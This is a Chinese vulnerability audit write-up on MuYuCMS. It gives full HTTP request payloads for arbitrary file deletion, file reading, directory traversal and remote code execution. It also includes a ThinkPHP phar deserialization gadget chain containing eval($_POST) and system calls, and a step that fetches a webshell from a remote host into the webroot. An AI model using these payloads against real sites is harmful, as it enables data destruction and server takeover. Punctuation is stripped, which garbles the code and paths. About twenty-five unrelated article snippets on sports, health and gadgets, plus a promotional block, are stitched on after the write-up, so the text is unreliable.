木鱼CMS系统审计小结
MuYuCMS基于Thinkphp开发的一套轻量级开源内容管理系统,专注为公司企业、个人站长提供快速建站提供解决方案。
环境搭建
我们利用phpstudy来搭建环境,选择Apache2。4。39MySQL5。7。26php5。6。9,同时利用PhpStorm来实现对项目的调试
漏洞复现分析任意文件删除
我们在网站的根目录下创建一个文件test。txt用来校验文件是否被删除
任意文件删除一
漏洞复现
登录后台后构造数据包POSTadmin。phpaccessoryfilesdel。htmlHTTP1。1Host:test。testContentLength:55Accept:XRequestedWith:XMLHttpRequestUserAgent:Mozilla5。0(WindowsNT10。0;Win64;x64)AppleWebKit537。36(KHTML,likeGecko)Chrome85。0。4183。83Safari537。36ContentType:applicationxwwwformurlencoded;charsetUTF8Origin:http:test。testReferer:http:test。testadmin。phpaccessoryfilelist。htmlAcceptEncoding:gzip,deflateAcceptLanguage:zhCN,zh;q0。9Cookie:muyucheckaccre1676530347;PHPSESSIDae5mpn24ivb25od6st8sdoouf7;muyufirst1676531718;XDEBUGSESSIONPHPSTORMConnection:closefiledeluruploadfiles。gitignore。。。。。。。。test。txt
文件被成功删除
漏洞分析
appadmincontrollerAccessory::filesdel
通过参数filedelurl拼接得到要删除文件的地址,利用unlink函数删除文件,中间没有做任何校验。
【帮助网安学习,需要网安学习资料关注我,私信回复资料免费获取】
网安学习成长路径思维导图
60网安经典常用工具包
100SRC漏洞分析报告
150网安攻防实战技术电子书
最权威CISSP认证考试指南题库
超1800页CTF实战技巧手册
最新网安大厂面试题合集(含答案)
APP客户端安全检测指南(安卓IOS)任意文件删除二
漏洞复现
登录后台后构造数据包POSTadmin。phpaccessorypicdel。htmlHTTP1。1Host:test。testContentLength:54Accept:XRequestedWith:XMLHttpRequestUserAgent:Mozilla5。0(WindowsNT10。0;Win64;x64)AppleWebKit537。36(KHTML,likeGecko)Chrome85。0。4183。83Safari537。36ContentType:applicationxwwwformurlencoded;charsetUTF8Origin:http:test。testReferer:http:test。testadmin。phpaccessoryfilelist。htmlAcceptEncoding:gzip,deflateAcceptLanguage:zhCN,zh;q0。9Cookie:muyucheckaccre1676530347;PHPSESSIDae5mpn24ivb25od6st8sdoouf7;muyufirst1676531718;XDEBUGSESSIONPHPSTORMConnection:closepicdeluruploadfiles。gitignore。。。。。。。。test。txt
漏洞分析
appadmincontrollerAccessory::picdel
通过参数picdelur拼接得到要删除图片的地址,利用unlink函数删除文件,中间没有做任何校验任意文件删除三
漏洞复现
登录后台后构造数据包GETeditorindex。php?adeletenodetypefilepathF:ToolsphpstudyproWWWMuYuCMSmasterMuYuCMSmastertemplate。。test。txtHTTP1。1Host:test。testCacheControl:maxage0UpgradeInsecureRequests:1Origin:http:test。testUserAgent:Mozilla5。0(WindowsNT10。0;Win64;x64)AppleWebKit537。36(KHTML,likeGecko)Chrome85。0。4183。83Safari537。36Accept:texthtml,applicationxhtmlxml,applicationxml;q0。9,imageavif,imagewebp,imageapng,;q0。8,applicationsignedexchange;vb3;q0。9Referer:http:test。testeditorindex。phpAcceptEncoding:gzip,deflateAcceptLanguage:zhCN,zh;q0。9Cookie:muyucheckaccre1676601856;PHPSESSID94241isj4cqrr0nefhv9rvs1b2;XDEBUGSESSIONPHPSTORMConnection:close
漏洞分析
AppControllerController::deletenode
AppCoreFile::deleteFile
AppControllerController::beforeFun
对传入的path判断了是否在合法的文件域中,但没有对传入的path没有进行跨目录的校验就删除了文件任意文件删除四
漏洞复现POSTadmin。phpdatabasesqldel。htmlHTTP1。1Host:test。testCacheControl:maxage0UpgradeInsecureRequests:1Origin:http:test。testUserAgent:Mozilla5。0(WindowsNT10。0;Win64;x64)AppleWebKit537。36(KHTML,likeGecko)Chrome85。0。4183。83Safari537。36Accept:texthtml,applicationxhtmlxml,applicationxml;q0。9,imageavif,imagewebp,imageapng,;q0。8,applicationsignedexchange;vb3;q0。9Referer:http:test。testeditorindex。phpAcceptEncoding:gzip,deflateAcceptLanguage:zhCN,zh;q0。9Cookie:muyucheckaccre1676601856;PHPSESSID94241isj4cqrr0nefhv9rvs1b2;XDEBUGSESSIONPHPSTORMConnection:closeContentType:applicationxwwwformurlencodedContentLength:19name。。。。test。txt
漏洞分析
appadmincontrollerDatabase::sqldel
获取post传入的参数name
利用delFile函数删除文件任意文件删除五
漏洞复现
登录后台后构造数据包POSTadmin。phpupdatermdirr。html?dirnameF:ToolsphpstudyproWWWMuYuCMSmasterMuYuCMSmastertemplate。。test。txtHTTP1。1Host:test。testContentLength:0Accept:UserAgent:Mozilla5。0(WindowsNT10。0;Win64;x64)AppleWebKit537。36(KHTML,likeGecko)Chrome85。0。4183。83Safari537。36XRequestedWith:XMLHttpRequestOrigin:http:test。testReferer:http:test。testadmin。phpsystemupdate。htmlAcceptEncoding:gzip,deflateAcceptLanguage:zhCN,zh;q0。9Cookie:PHPSESSIDd3bt6cnt59c2dfq7pshva5ffc1;muyucheckaccre1676878715;muyufirst1676879341Connection:close
漏洞分析
appadmincontrollerUpdate::rmdirr
传入的参数dirname经过简单的判断,然后调用unlink函数去删除任意文件读取
漏洞复现
登录后构造数据包GETeditorindex。php?agetfilefilepathF:ToolsphpstudyproWWWMuYuCMSmasterMuYuCMSmastertemplate。。test。txtHTTP1。1Host:test。testCacheControl:maxage0UpgradeInsecureRequests:1Origin:http:test。testUserAgent:Mozilla5。0(WindowsNT10。0;Win64;x64)AppleWebKit537。36(KHTML,likeGecko)Chrome85。0。4183。83Safari537。36Accept:texthtml,applicationxhtmlxml,applicationxml;q0。9,imageavif,imagewebp,imageapng,;q0。8,applicationsignedexchange;vb3;q0。9Referer:http:test。testeditorindex。phpAcceptEncoding:gzip,deflateAcceptLanguage:zhCN,zh;q0。9Cookie:muyucheckaccre1676601856;PHPSESSID94241isj4cqrr0nefhv9rvs1b2;XDEBUGSESSIONPHPSTORMConnection:close
成功读取文件信息
漏洞分析
AppControllerController::getfile
列目录
漏洞复现
登录后构造数据包GETeditorindex。php?adirlistdirpathF:ToolsphpstudyproWWWMuYuCMSmasterMuYuCMSmastertemplate。。。。。。。。。。。。。。。。HTTP1。1Host:test。testCacheControl:maxage0UpgradeInsecureRequests:1Origin:http:test。testUserAgent:Mozilla5。0(WindowsNT10。0;Win64;x64)AppleWebKit537。36(KHTML,likeGecko)Chrome85。0。4183。83Safari537。36Accept:texthtml,applicationxhtmlxml,applicationxml;q0。9,imageavif,imagewebp,imageapng,;q0。8,applicationsignedexchange;vb3;q0。9Referer:http:test。testeditorindex。phpAcceptEncoding:gzip,deflateAcceptLanguage:zhCN,zh;q0。9Cookie:muyucheckaccre1676601856;PHPSESSID94241isj4cqrr0nefhv9rvs1b2;XDEBUGSESSIONPHPSTORMConnection:close
成功将根目录下的信息显露出来
漏洞分析
AppControllerController::dirlist
AppCoreJstree::getDir
AppControllerController::beforeFun
对传入的dirpath判断了是否在合法的文件域中,但没有对传入的dirpath没有进行跨目录的校验就打印出目录信息任意代码执行任意代码执行一
漏洞复现
登录后构造数据包,读取config文件内容GETeditorindex。php?agetfilefilepathF:ToolsphpstudyproWWWMuYuCMSmasterMuYuCMSmastertemplatemembertempuserconfig。phpHTTP1。1Host:test。testCacheControl:maxage0UpgradeInsecureRequests:1Origin:http:test。testUserAgent:Mozilla5。0(WindowsNT10。0;Win64;x64)AppleWebKit537。36(KHTML,likeGecko)Chrome85。0。4183。83Safari537。36Accept:texthtml,applicationxhtmlxml,applicationxml;q0。9,imageavif,imagewebp,imageapng,;q0。8,applicationsignedexchange;vb3;q0。9Referer:http:test。testeditorindex。phpAcceptEncoding:gzip,deflateAcceptLanguage:zhCN,zh;q0。9Cookie:muyucheckaccre1676601856;PHPSESSID94241isj4cqrr0nefhv9rvs1b2;XDEBUGSESSIONPHPSTORMConnection:close
此时需要获取的并不是文件内容,而是更改之后文件的key
复制文件校验码替换到下面数据包中GETeditorindex。php?asavefilefilepathF:ToolsphpstudyproWWWMuYuCMSmasterMuYuCMSmastertemplatemembertempuserconfig。phpfilekey5e9c862ce52986e5437652d707c7c82ffilecontentlt;?phpphpinfo();php?HTTP1。1Host:test。testCacheControl:maxage0UpgradeInsecureRequests:1Origin:http:test。testUserAgent:Mozilla5。0(WindowsNT10。0;Win64;x64)AppleWebKit537。36(KHTML,likeGecko)Chrome85。0。4183。83Safari537。36Accept:texthtml,applicationxhtmlxml,applicationxml;q0。9,imageavif,imagewebp,imageapng,;q0。8,applicationsignedexchange;vb3;q0。9Referer:http:test。testeditorindex。phpAcceptEncoding:gzip,deflateAcceptLanguage:zhCN,zh;q0。9Cookie:muyucheckaccre1676601856;PHPSESSID94241isj4cqrr0nefhv9rvs1b2;XDEBUGSESSIONPHPSTORMConnection:close
访问文件在网站上对应的位置,发现代码已经被成功执行
也可以执行其他代码
漏洞分析
AppControllerController::savefile
savefile有保存文件的操作,但是需要获取到文件的校验码。所以就可以通过先查询文件的相关信息,然后再对文件进行修改
AppCoreFile::setFileContent
任意代码执行二
漏洞复现
登录后构造数据包POSTadmin。phpupdategetFile。html?urlhttp:127。0。0。1:8000shell。phpsavedirF:ToolsphpstudyproWWWMuYuCMSmasterMuYuCMSmastertemplateHTTP1。1Host:test。testContentLength:0Accept:UserAgent:Mozilla5。0(WindowsNT10。0;Win64;x64)AppleWebKit537。36(KHTML,likeGecko)Chrome85。0。4183。83Safari537。36XRequestedWith:XMLHttpRequestOrigin:http:test。testReferer:http:test。testadmin。phpsystemupdate。htmlAcceptEncoding:gzip,deflateAcceptLanguage:zhCN,zh;q0。9Cookie:PHPSESSIDd3bt6cnt59c2dfq7pshva5ffc1;muyucheckaccre1676878715;muyufirst1676879341;XDEBUGSESSIONPHPSTORMConnection:close
指定远程url下载文件,下载的文件保存到指定位置
访问指定的文件目录,发现代码被成功执行
漏洞分析
appadmincontrollerUpdate::getFile
通过url指定获取远程文件的地址,savedir指定保存文件的路径,并未对文件的内容和类型进行校验,所以就会产生代码执行漏洞phar反序列化
漏洞复现lt;?phpnamespacethink{abstractclassModel{protectedappend;privatedata;functionconstruct(){thisappend〔aaaa〔123456〕〕;thisdata〔aaaanewRequest()〕;}}classRequest{protectedparam;protectedhook;protectedfilter;protectedconfig;functionconstruct(){thisfiltersystem;thisconfig〔varajax〕;thishook〔visible〔this,isAjax〕〕;thisparam〔calc〕;}}}namespacethinkprocesspipes{usethinkmodelPivot;classWindows{privatefiles;publicfunctionconstruct(){thisfiles〔newPivot()〕;}}}namespacethinkmodel{usethinkModel;classPivotextendsModel{}}namespace{usethinkprocesspipesWindows;unlink(shell。jpg);pharnewPhar(shell。phar);pharstartBuffering();pharsetStub(GIF89a。lt;?phpHALTCOMPILER();?);objectnewWindows();objecthahaeval(POST〔a〕);;objecthahaphpinfo();;pharsetMetadata(object);pharaddFromString(a,a);添加要压缩的文件pharstopBuffering();echo(base64encode(serialize(newWindows())));}?
生成phar序列化数据包修改后缀,启动python服务器
构造数据包下载远程的文件到本地GETpublicstaticadminstaticueditorphpcontroller。php?actioncatchimagesource〔〕http:127。0。0。1:8000shell。pngHTTP1。1Host:test。testUpgradeInsecureRequests:1UserAgent:Mozilla5。0(WindowsNT10。0;Win64;x64)AppleWebKit537。36(KHTML,likeGecko)Chrome85。0。4183。83Safari537。36Accept:texthtml,applicationxhtmlxml,applicationxml;q0。9,imageavif,imagewebp,imageapng,;q0。8,applicationsignedexchange;vb3;q0。9AcceptEncoding:gzip,deflateAcceptLanguage:zhCN,zh;q0。9Cookie:XDEBUGSESSIONPHPSTORMConnection:close
执行phar序列化
http:test。testadmin。phpupdatermdirr。html?dirnamephar:。publicuploadimages1676882763141961。png
注意事项
在最开始,获取远程图片的时候,一直出现错误提示链接contentType不正确通过在代码中查找,定位到问题位置
校验了ContentType的值经过不断的调试仍然发现不了问题出现在哪
但是发现通过phpstudy默认的apache服务是没问题的通过抓包对比发现一个是ContentType另一个是Contenttype
我直接修改了python的源代码将其中的小写t替换成了大写T
漏洞分析
appadmincontrollerUpdate::rmdirr
通过协议绕过了对文件名的检测然后触发了反序列漏洞
MuYuCMSmasterpublicstaticadminstaticueditorphpcontroller。php
河南嵩山龙门队球迷对王上源的解读1。王上源15场比赛,总传球数为751,传球成功620,传球成功率为82。5关键传球29个,场均不到2个。对比了一下其他队中场或者可打多个位置的国内球员,传球最好的是严鼎皓,上源跟
糖尿病人午睡导致血糖升高?怎么回事?很多专家在研究糖尿病病人的过程中发现,糖尿病和中午睡觉有关系当然,在这背后存在多方面的因素。其中包括爱睡觉了的可能不爱运动,因此导致脂肪堆积,体重增加并且午睡太久可能会导致晚上睡不
服用阿卡波糖,出现了低血糖该怎么办呢?目前中国糖尿病流行趋势日益严重,患病率不断上升!相信糖尿病患者对阿卡波糖都是非常熟悉的。那么,如果服用阿卡波糖出现了低血糖症状,是否可以像其他药物或其他原因引起的低血糖一样,服用糖
保养血管从饮食入手众所周知,血管是人体非常重要的一部分,它不仅可以运输氧气和营养物质,也是清除二氧化碳和代谢产物的管道。一旦血管变窄或硬化,就会影响氧气和血液的供应,甚至诱发心脑血管疾病。所以在此提
这两名哈佛学生如何在常规基础上革新糖尿病治疗?文FrederickDaso对代谢性和慢性疾病的长期健康管理一直是美国医疗保健系统最大的成本负担,而由AmberNigam和JieSun两位哈佛毕业生于2021年6月创立的Basy
中甲最新积分榜四川九牛连场赢下6分硬仗重返第4石家庄仍稳居第6北京时间9月7日,中甲联赛第19轮继续角逐,再赛3场战罢,最新战况积分榜四川九牛20完胜石家庄功夫,赛前双方积分仅差1分,分别排在积分榜的第5和第6名,是一场势均力敌的抢6分大战,
首批用户反馈ColorOS13流畅性和后台双提升,亮点功能多多ColorOS13已经发布一周时间了,很多小伙伴都迫不及待地想升级体验一番,这里需要羡慕一下OPPOFindNFindX5ProFindX5和一加10Pro这些首批适配公测版本的用
宝宝腹泻全家烦,穴位贴敷忧愁散近日,欢欢(化名)的母亲拉着湖医附一医院穴位贴敷中心雷蕾医生的手感谢地说宝宝大便的颜色正常了,腹泻也终于好了,您的方子可真灵,我现在可算安心一些了。8个月大的欢欢,因为半个月之前吃
索尼开始向全球PlayStation5推送1440p支持等功能更新周三的时候,索尼在一篇PlayStation博客文章中宣布了将向全球推送1440p软件更新的消息。经过一段时间的测试,这项功能使得玩家能够体验2K60120Hz的显示输出。略为遗憾
深度剖析华为Mate50卫星通讯功能,助你快速了解手机卫星通信模式我是树言新享。点击关注,为您分享最新数字化资讯和干货。随着Mate50智能手机的首次亮相,华为已成为全球首家为当代技术提供卫星消息功能和连接的智能手机制造商。华为Mate50系列支
手把手教你如何在手机上设置地震预警功能今天四川泸定的地震让人很是揪心,经历过汶川大地震,大家都是一朝被蛇咬,十年怕井绳。天灾人祸面前,人类的力量是如此渺小。也许很多人还不知道现在的智能手机绝大部分都有自然灾害预警功能。
详细解析小米电视EA4343英寸金属全面屏蓝牙语音L43M7EA以旧换新外形外观窄边框,43寸,看起来很精致的感觉。小米的产品做得越来越好,值得期待。运行速度各个软件之间切换,很顺畅,可以自己下载安装不同的影视软件,方便追剧。屏幕音效高清,就是不同,特
DLP无缝大屏幕要按照不同部位不同保养DLP无缝大屏幕单元内的光学系统除了滤光透光中继聚光反射偏光等功能外,有些光学部件设置是高温隔热避免烧坏偏光板而设置的,如果该部件失效,将无法起到应有的隔热效果,所以需要定期检查维
便宜没好货?盘点一下能和大牌媲美的平价家电!一分价钱一分货?现在不单单是这样了,有的只是广告做的好而抬高价格,而有些价格合适性能也在线的往往被我们所忽视,今天给大家说一款平替洗衣机。西门子洗衣机最高脱水转速1200显示屏LE
重装系统后找不到硬盘怎么办有网友的win10系统电脑出了系统故障进行了重装,但是又发现了重装系统后找不到硬盘的新问题,那么重装系统后找不到硬盘怎么办呢?下面小编来分享下解决重装系统后找不到硬盘的方法。工具原
放弃吧,劝,永远改变不了一个人现在手机里自带的天气预报软件或者下载的第三方软件已经非常准确,而且还能实时更新和预测未来七天天气预测。教了父母好多次了,劝他们没必要看电视,但是他们仍然每天晚上等新闻联播后要看完天
这两款曾经的问题机型率先引入了13代酷睿,这次表现如何?大家知道,我们告诉大家的13代酷睿机型正式开始登陆市场的时间是2023年2月。而在此之前,国内品牌的个别机型已亮相如神舟的战神Z7机械革命极光Z等。但我们也明确告诉过大家这些低价位
考试总错题,家长干着急,喵喵错题打印机C2助你一臂之力子不教,父之过。身为家长,整天叮嘱孩子看书做作业,他嘴上答应得勤快,可非要等假期没几天了才着急。以理服人没效果,又不能硬来,真是心力交瘁。为了鼓励他的积极性,提高学习效率,过年时我
富氢制水机,抗氧化抗疲劳,英语文案怎么写饮用氢水,能够改善身体的新陈代谢,减少疲劳和提高活力。氢分子是天然抗氧化剂,它有助于排出有害元素,例如臭氧过氧化氢和氯,使饮用水更加安全可靠。今天选择亚马逊一款在售的富氢制水机,一
XP系统台式机如何共享打印机给win10笔记本?话不多说,直接上干货。1。共享打印机,在高级共享里给权限于guest2。进管理用户,启用guest帐户3。运行gpedit。msc,本地策略里,用户权力指派,在允许访问里添加gue
消除笔软件哪个好用?建议收藏这些软件大家都知道消除笔是用来干什么的吧?有时候我们在网上看到喜欢的图片,想要把它们下载下来,可是如果图片带有一些水印或者文字的话,就比较影响美观。这种情况下,消除笔就派上用场了,它可以把
表友实拍种草三款倍儿有面的腕表推荐腕表之家腕表推荐随着假期的结束,新一年的复工日也开始了。大家的年过的怎么样?团圆的时刻有没有给亲友们分享自己的爱表呢?今年的农历新年大家都戴着什么表去走亲戚呢?我们潜伏在腕表之家的